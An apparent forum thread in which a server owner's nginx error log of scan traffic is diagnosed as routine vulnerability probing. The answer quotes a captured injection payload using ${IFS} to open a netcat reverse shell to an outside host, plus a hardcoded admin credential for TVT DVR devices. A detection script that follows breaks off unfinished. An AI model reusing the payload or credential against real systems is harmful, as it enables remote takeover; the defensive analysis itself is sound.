By looking at the nginx error log, is my server under attack?

user938363 · Oct 4, 2019 · Viewed 8.9k times

Here is a portion of the nginx error log on Ubuntu 18.04. There are constant HTTP requests to my Node.js server. My question is: is the server under attack? By looking online, 52.69.23.0/255.255.255.0 is a block from Tokyo, Japan.

2019/10/02 02:50:03 [error] 869#0: *415 directory index of "/ebs/www/" is forbidden, client: 221.126.40.214, server: 52.69.23.227, request: "HEAD / HTTP/1.1", host: "hongkong.me", referrer: "http://hongkong.me"
2019/10/02 03:02:42 [error] 869#0: *416 directory index of "/ebs/www/" is forbidden, client: 71.6.232.4, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:52 [error] 869#0: *418 open() "/ebs/www/TP/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /TP/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:52 [error] 869#0: *419 open() "/ebs/www/TP/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /TP/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:52 [error] 869#0: *420 open() "/ebs/www/thinkphp/html/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /thinkphp/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:52 [error] 869#0: *421 open() "/ebs/www/html/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *422 open() "/ebs/www/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *423 open() "/ebs/www/TP/html/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /TP/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *424 open() "/ebs/www/elrekt.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /elrekt.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *425 open() "/ebs/www/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *426 directory index of "/ebs/www/" is forbidden, client: 106.13.99.19, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 06:06:25 [error] 869#0: *427 directory index of "/ebs/www/" is forbidden, client: 209.17.96.194, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 06:08:39 [error] 869#0: *429 open() "/ebs/www/TP/public/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /TP/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:40 [error] 869#0: *430 open() "/ebs/www/TP/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /TP/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:40 [error] 869#0: *431 open() "/ebs/www/thinkphp/html/public/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /thinkphp/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:40 [error] 869#0: *432 open() "/ebs/www/html/public/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:40 [error] 869#0: *433 open() "/ebs/www/public/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:40 [error] 869#0: *434 open() "/ebs/www/TP/html/public/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /TP/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:41 [error] 869#0: *435 open() "/ebs/www/elrekt.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /elrekt.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:41 [error] 869#0: *436 open() "/ebs/www/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:41 [error] 869#0: *437 directory index of "/ebs/www/" is forbidden, client: 132.232.15.163, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
[ E 2019-10-02 06:17:55.8878 846/Tc age/Cor/SecurityUpdateChecker.h:362 ]: Security update check failed: File not readable: /home/ubuntu/.rvm/gems/ruby-2.3.3/gems/passenger-5.1.12/resources/update_check_client_cert.pem (next check in 24 hours)
2019/10/02 06:51:06 [error] 869#0: *438 directory index of "/ebs/www/" is forbidden, client: 167.114.227.178, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 09:56:10 [error] 869#0: *440 directory index of "/ebs/www/" is forbidden, client: 62.98.60.237, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 11:15:18 [error] 869#0: *442 directory index of "/ebs/www/" is forbidden, client: 182.149.116.159, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 11:41:21 [error] 869#0: *443 directory index of "/ebs/www/" is forbidden, client: 183.129.160.229, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 11:43:43 [error] 869#0: *444 directory index of "/ebs/www/" is forbidden, client: 150.107.206.166, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 13:16:08 [error] 869#0: *445 directory index of "/ebs/www/" is forbidden, client: 77.75.90.220, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 13:28:43 [error] 869#0: *446 directory index of "/ebs/www/" is forbidden, client: 219.92.248.187, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 15:38:08 [error] 869#0: *449 open() "/ebs/www/TP/public/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /TP/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:08 [error] 869#0: *450 open() "/ebs/www/TP/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /TP/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:08 [error] 869#0: *451 open() "/ebs/www/thinkphp/html/public/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /thinkphp/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:08 [error] 869#0: *452 open() "/ebs/www/html/public/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:08 [error] 869#0: *453 open() "/ebs/www/public/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:09 [error] 869#0: *454 open() "/ebs/www/TP/html/public/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /TP/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:09 [error] 869#0: *455 open() "/ebs/www/elrekt.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /elrekt.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:09 [error] 869#0: *456 open() "/ebs/www/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:11 [error] 869#0: *457 directory index of "/ebs/www/" is forbidden, client: 129.28.192.228, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 15:55:41 [error] 869#0: *458 directory index of "/ebs/www/" is forbidden, client: 189.126.64.134, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 16:27:39 [error] 869#0: *459 directory index of "/ebs/www/" is forbidden, client: 72.44.25.17, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 16:50:44 [error] 869#0: *460 open() "/ebs/www/editBlackAndWhiteList" failed (2: No such file or directory), client: 93.174.93.178, server: 52.69.23.227, request: "POST /editBlackAndWhiteList HTTP/1.1", host: "my_server_ip"
2019/10/02 17:32:48 [error] 869#0: *461 directory index of "/ebs/www/" is forbidden, client: 151.70.192.60, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 17:33:10 [error] 869#0: *462 directory index of "/ebs/www/" is forbidden, client: 151.70.192.60, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 17:33:11 [error] 869#0: *463 directory index of "/ebs/www/" is forbidden, client: 151.70.192.60, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 17:33:56 [error] 869#0: *464 directory index of "/ebs/www/" is forbidden, client: 151.70.192.60, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 17:48:33 [error] 869#0: *465 directory index of "/ebs/www/" is forbidden, client: 110.34.3.142, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 19:37:18 [error] 869#0: *467 directory index of "/ebs/www/" is forbidden, client: 80.132.43.129, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 19:54:15 [error] 869#0: *468 directory index of "/ebs/www/" is forbidden, client: 52.206.7.27, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 19:59:40 [error] 869#0: *469 directory index of "/ebs/www/" is forbidden, client: 128.14.134.170, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 20:30:02 [error] 869#0: *470 directory index of "/ebs/www/" is forbidden, client: 209.17.96.194, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 21:02:49 [error] 869#0: *472 open() "/ebs/www/editBlackAndWhiteList" failed (2: No such file or directory), client: 93.174.93.178, server: 52.69.23.227, request: "POST /editBlackAndWhiteList HTTP/1.1", host: "my_server_ip"
2019/10/02 21:08:55 [error] 869#0: *474 directory index of "/ebs/www/" is forbidden, client: 46.217.157.121, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 21:08:55 [error] 869#0: *475 directory index of "/ebs/www/" is forbidden, client: 46.217.157.121, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 21:11:19 [error] 869#0: *476 open() "/ebs/www/wp-login.php" failed (2: No such file or directory), client: 120.26.95.190, server: 52.69.23.227, request: "GET /wp-login.php HTTP/1.1", host: "ec2-54-64-226-99.ap-northeast-1.compute.amazonaws.com"
2019/10/02 21:30:34 [error] 869#0: *477 directory index of "/ebs/www/" is forbidden, client: 62.109.0.97, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 22:02:26 [error] 869#0: *478 directory index of "/ebs/www/" is forbidden, client: 88.132.136.65, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 23:51:33 [error] 869#0: *479 directory index of "/ebs/www/" is forbidden, client: 183.129.160.229, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 01:32:25 [error] 869#0: *480 directory index of "/ebs/www/" is forbidden, client: 200.161.234.246, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 01:56:03 [error] 869#0: *481 directory index of "/ebs/www/" is forbidden, client: 89.37.100.98, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 02:43:38 [error] 869#0: *483 directory index of "/ebs/www/" is forbidden, client: 47.34.25.82, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 03:03:44 [error] 869#0: *484 directory index of "/ebs/www/" is forbidden, client: 89.37.100.98, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 03:24:46 [error] 869#0: *485 directory index of "/ebs/www/" is forbidden, client: 89.37.100.98, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 03:31:23 [error] 869#0: *486 directory index of "/ebs/www/" is forbidden, client: 120.220.28.152, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 05:25:46 [error] 869#0: *493 directory index of "/ebs/www/" is forbidden, client: 162.62.17.159, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 05:25:46 [error] 869#0: *494 directory index of "/ebs/www/" is forbidden, client: 162.62.17.159, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 06:15:59 [error] 869#0: *497 directory index of "/ebs/www/" is forbidden, client: 93.157.241.194, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
[ E 2019-10-03 06:17:55.9323 846/Tc age/Cor/SecurityUpdateChecker.h:362 ]: Security update check failed: File not readable: /home/ubuntu/.rvm/gems/ruby-2.3.3/gems/passenger-5.1.12/resources/update_check_client_cert.pem (next check in 24 hours)
2019/10/03 06:26:39 [error] 869#0: *499 directory index of "/ebs/www/" is forbidden, client: 185.113.238.146, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 06:38:29 [error] 869#0: *500 directory index of "/ebs/www/" is forbidden, client: 187.85.133.141, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 07:12:41 [error] 869#0: *502 directory index of "/ebs/www/" is forbidden, client: 14.184.219.103, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 07:17:46 [error] 869#0: *503 directory index of "/ebs/www/" is forbidden, client: 103.230.241.39, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 07:26:52 [error] 869#0: *504 directory index of "/ebs/www/" is forbidden, client: 185.238.237.117, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 07:33:36 [error] 869#0: *505 directory index of "/ebs/www/" is forbidden, client: 80.82.70.118, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 07:53:00 [error] 869#0: *508 directory index of "/ebs/www/" is forbidden, client: 60.191.52.254, server: 52.69.23.227, request: "HEAD http://112.124.42.80:63435/ HTTP/1.1", host: "112.124.42.80:63435"
2019/10/03 08:06:29 [error] 869#0: *510 directory index of "/ebs/www/" is forbidden, client: 60.208.210.67, server: 52.69.23.227, request: "HEAD http://123.125.114.144/ HTTP/1.1", host: "123.125.114.144"
2019/10/03 08:06:44 [error] 869#0: *511 directory index of "/ebs/www/" is forbidden, client: 46.170.207.14, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 09:04:28 [error] 869#0: *512 directory index of "/ebs/www/" is forbidden, client: 181.168.206.29, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 09:44:08 [error] 869#0: *513 directory index of "/ebs/www/" is forbidden, client: 178.212.49.134, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 10:55:19 [error] 869#0: *514 directory index of "/ebs/www/" is forbidden, client: 222.142.157.79, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 12:32:56 [error] 869#0: *516 directory index of "/ebs/www/" is forbidden, client: 81.213.111.207, server: 52.69.23.227, request: "GET / HTTP/1.0", host: "my_server_ip"
2019/10/03 13:23:45 [error] 869#0: *518 open() "/ebs/www/editBlackAndWhiteList" failed (2: No such file or directory), client: 93.174.93.178, server: 52.69.23.227, request: "POST /editBlackAndWhiteList HTTP/1.1", host: "my_server_ip"
2019/10/03 13:37:13 [error] 869#0: *519 directory index of "/ebs/www/" is forbidden, client: 143.202.226.42, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 13:50:41 [error] 869#0: *520 directory index of "/ebs/www/" is forbidden, client: 84.228.31.42, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 14:07:19 [error] 869#0: *521 directory index of "/ebs/www/" is forbidden, client: 66.252.220.245, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 14:36:17 [error] 869#0: *522 directory index of "/ebs/www/" is forbidden, client: 118.45.169.144, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 14:47:49 [error] 869#0: *523 directory index of "/ebs/www/" is forbidden, client: 103.113.104.144, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 15:05:25 [error] 869#0: *525 open() "/ebs/www/TP/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /TP/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *526 open() "/ebs/www/TP/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /TP/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *527 open() "/ebs/www/thinkphp/html/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /thinkphp/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *528 open() "/ebs/www/html/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *529 open() "/ebs/www/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *530 open() "/ebs/www/TP/html/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /TP/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:26 [error] 869#0: *531 open() "/ebs/www/elrekt.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /elrekt.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:26 [error] 869#0: *532 open() "/ebs/www/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:28 [error] 869#0: *533 directory index of "/ebs/www/" is forbidden, client: 222.186.130.20, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 15:14:25 [error] 869#0: *534 directory index of "/ebs/www/" is forbidden, client: 35.205.71.151, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 16:11:51 [error] 869#0: *535 directory index of "/ebs/www/" is forbidden, client: 175.158.139.94, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 16:33:33 [error] 869#0: *537 open() "/ebs/www/TP/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /TP/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:34 [error] 869#0: *538 open() "/ebs/www/TP/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /TP/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:34 [error] 869#0: *539 open() "/ebs/www/thinkphp/html/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /thinkphp/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:34 [error] 869#0: *540 open() "/ebs/www/html/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:35 [error] 869#0: *541 open() "/ebs/www/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:35 [error] 869#0: *542 open() "/ebs/www/TP/html/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /TP/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:36 [error] 869#0: *543 open() "/ebs/www/elrekt.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /elrekt.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:36 [error] 869#0: *544 open() "/ebs/www/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:36 [error] 869#0: *545 directory index of "/ebs/www/" is forbidden, client: 132.145.207.123, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 16:46:53 [error] 869#0: *546 open() "/ebs/www/adminer.php" failed (2: No such file or directory), client: 46.253.39.142, server: 52.69.23.227, request: "GET /adminer.php HTTP/1.1", host: "my_server_ip", referrer: "http://my_server_ip/adminer.php"
2019/10/03 16:47:04 [error] 869#0: *547 open() "/ebs/www/adminer.php" failed (2: No such file or directory), client: 176.104.107.105, server: 52.69.23.227, request: "GET /adminer.php HTTP/1.1", host: "my_server_ip", referrer: "http://my_server_ip/adminer.php"
2019/10/03 17:11:10 [error] 869#0: *548 directory index of "/ebs/www/" is forbidden, client: 45.161.103.201, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 19:12:28 [error] 869#0: *549 directory index of "/ebs/www/" is forbidden, client: 181.115.249.173, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 19:54:54 [error] 869#0: *550 directory index of "/ebs/www/" is forbidden, client: 77.247.108.162, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 20:47:59 [error] 869#0: *552 directory index of "/ebs/www/" is forbidden, client: 138.59.187.50, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 20:48:31 [error] 869#0: *553 directory index of "/ebs/www/" is forbidden, client: 138.59.187.50, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 20:58:00 [error] 869#0: *554 directory index of "/ebs/www/" is forbidden, client: 89.248.169.12, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 22:34:49 [error] 869#0: *555 directory index of "/ebs/www/" is forbidden, client: 92.63.192.239, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 22:50:36 [error] 869#0: *556 directory index of "/ebs/www/" is forbidden, client: 59.5.187.231, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 22:52:45 [error] 869#0: *557 directory index of "/ebs/www/" is forbidden, client: 36.82.101.191, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"

Answer

Vincent · Oct 5, 2019

Any server connected to the public internet will be under attack on some level, even if it is not vulnerable. Internet-wide vulnerability scanning will find its way to you. The traffic indicates PHP scans and some other interesting traffic which has recently shown up on my IPS:

The host 93.174.93[.]178 sent an HTTP POST request to the destination URL "editBlackAndWhiteList" with Base64-encoded credentials:

admin:{12213BD1-69C7-4862-843D-260500D1DA40}

XML Payload:

refuse allow ip iprange mac true refuse true ip $(nc${IFS}93.174.93.178${IFS}31337${IFS}-e${IFS}$SHELL&)

IFS stands for "internal field separator". It is used by the shell to determine how to do word splitting.

The default value for IFS consists of whitespace characters (space, tab, and newline). $IFS or ${IFS} is often used in command injection to replace whitespace. For many command-line interpreters (the shells of Unix operating systems), the internal field separator is a variable that defines the characters used to separate a pattern into tokens for some operations. $(nc 93.174.93[.]178 31337 -e $SHELL&) is a Netcat reverse shell to host 93.174.93[.]178 on port 31337.

Fortinet has an IPS signature for this traffic, “HTTP.Unix.Shell.IFS.Remote.Code.Execution.” It indicates the detection of suspicious HTTP requests that use internal field separators.

https://fortiguard.com/encyclopedia/ips/45677/http-unix-shell-ifs-remote-code-execution

Snort IPS flags this traffic under the signature "ET POLICY Incoming Basic Auth Base64 HTTP Password detected unencrypted."

The host is attempting to exploit a Remote Code Execution vulnerability in the Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC} API via a hardcoded 'admin' web GUI password to get a reverse shell. Six PoCs are available on GitHub: https://github.com/mcw0/PoC/blob/master/TVT_and_OEM_IPC_NVR_DVR_RCE_Backdoor_and_Information_Disclosure.txt

It would be wise to set up an IPS in front of your web server.
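As an added example (not part of the question or of Vincent's answer), the following Python script does the triage the thread describes by hand: it parses nginx error-log lines of the shape shown in the question, groups requests by client address, tags the familiar probe paths (the ThinkPHP path set, wp-login.php, adminer.php, the POST to /editBlackAndWhiteList, absolute-URI requests that test for an open proxy), and checks a request body for the ${IFS} command-injection pattern and the netcat reverse-shell target. The fingerprint rules, their labels and the verdict threshold are my assumptions modelled on the page's log; the sample log lines are copied from the question (plus its Passenger line, which the parser should skip), and the sample body is the payload quoted in the answer.

```python
"""Triage nginx error-log lines and a suspicious request body.

Added example; not code from the question, the answer, or nginx.
Fingerprints and labels are assumptions modelled on the thread's log.
"""
import re
from collections import Counter, defaultdict

# One nginx error-log request line: timestamp, level, pid#tid, *conn,
# free-text message, then the context fields nginx appends.
LOG_RE = re.compile(
    r'^(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) \[(?P<level>\w+)\] \d+#\d+: \*\d+ '
    r'(?P<msg>.*?), client: (?P<client>[0-9a-fA-F.:]+), server: (?P<server>[^,]*), '
    r'request: "(?P<request>[^"]*)"'
    r'(?:, host: "(?P<host>[^"]*)")?'
    r'(?:, referrer: "(?P<referrer>[^"]*)")?$'
)

# (label, required method or None, path pattern). Assumed rules.
FINGERPRINTS = [
    ("thinkphp-probe", None, re.compile(
        r'^/(?:TP|thinkphp)(?:/|$)|^/(?:html/)?public/index\.php$|^/elrekt\.php$')),
    ("php-index-probe", None, re.compile(r'^/index\.php$')),
    ("wordpress-probe", None, re.compile(r'^/wp-login\.php$')),
    ("adminer-probe", None, re.compile(r'^/adminer\.php$')),
    ("tvt-dvr-rce-probe", "POST", re.compile(r'^/editBlackAndWhiteList$')),
    ("open-proxy-probe", None, re.compile(r'^https?://')),  # absolute-URI target
]

# Shell tricks from the answer: ${IFS} as a space substitute, $(...) / backticks.
IFS_RE = re.compile(r'\$\{IFS\}|\$IFS\b')
SUBST_RE = re.compile(r'\$\([^)]*\)|`[^`]*`')
NC_RE = re.compile(r'\bnc\s+(\d{1,3}(?:\.\d{1,3}){3})\s+(\d{1,5})\b')


def parse_line(line):
    """Return a dict for an nginx request error line, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None  # e.g. Passenger lines, which use a different format
    entry = m.groupdict()
    parts = entry["request"].split()
    entry["method"] = parts[0] if parts else ""
    target = parts[1] if len(parts) > 1 else ""
    entry["path"] = target.split("?", 1)[0]  # drop the query string
    return entry


def classify(entry):
    """Label one request: a known probe, a bare root fetch, or 'other'."""
    for label, method, pattern in FINGERPRINTS:
        if method is not None and entry["method"] != method:
            continue
        if pattern.search(entry["path"]):
            return label
    return "root-probe" if entry["path"] == "/" else "other"


def summarize(lines):
    """Group labels per client; also count lines the parser did not understand."""
    per_client = defaultdict(Counter)
    unparsed = 0
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            unparsed += 1
            continue
        per_client[entry["client"]][classify(entry)] += 1
    return per_client, unparsed


def verdicts(per_client):
    """'scanner' once a client hit any fingerprinted path, else 'probe'."""
    return {ip: ("scanner" if any(k not in ("root-probe", "other") for k in c) else "probe")
            for ip, c in per_client.items()}


def has_command_injection(body):
    """True when a body carries shell substitution or the IFS whitespace trick."""
    return bool(IFS_RE.search(body) or SUBST_RE.search(body))


def find_reverse_shell(body):
    """Return (host, port) of an 'nc HOST PORT' call after undoing ${IFS}."""
    m = NC_RE.search(IFS_RE.sub(" ", body))
    return (m.group(1), int(m.group(2))) if m else None


# Sample input: lines copied from the question (index 4 is its Passenger line).
SAMPLE_LOG = [
    '2019/10/02 02:50:03 [error] 869#0: *415 directory index of "/ebs/www/" is forbidden, client: 221.126.40.214, server: 52.69.23.227, request: "HEAD / HTTP/1.1", host: "hongkong.me", referrer: "http://hongkong.me"',
    '2019/10/02 05:29:52 [error] 869#0: *418 open() "/ebs/www/TP/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /TP/public/index.php HTTP/1.1", host: "my_server_ip"',
    '2019/10/02 05:29:54 [error] 869#0: *424 open() "/ebs/www/elrekt.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /elrekt.php HTTP/1.1", host: "my_server_ip"',
    '2019/10/02 06:06:25 [error] 869#0: *427 directory index of "/ebs/www/" is forbidden, client: 209.17.96.194, server: 52.69.23.227, request: "GET / HTTP/1.0"',
    '[ E 2019-10-02 06:17:55.8878 846/Tc age/Cor/SecurityUpdateChecker.h:362 ]: Security update check failed: File not readable: /home/ubuntu/.rvm/gems/ruby-2.3.3/gems/passenger-5.1.12/resources/update_check_client_cert.pem (next check in 24 hours)',
    '2019/10/02 16:50:44 [error] 869#0: *460 open() "/ebs/www/editBlackAndWhiteList" failed (2: No such file or directory), client: 93.174.93.178, server: 52.69.23.227, request: "POST /editBlackAndWhiteList HTTP/1.1", host: "my_server_ip"',
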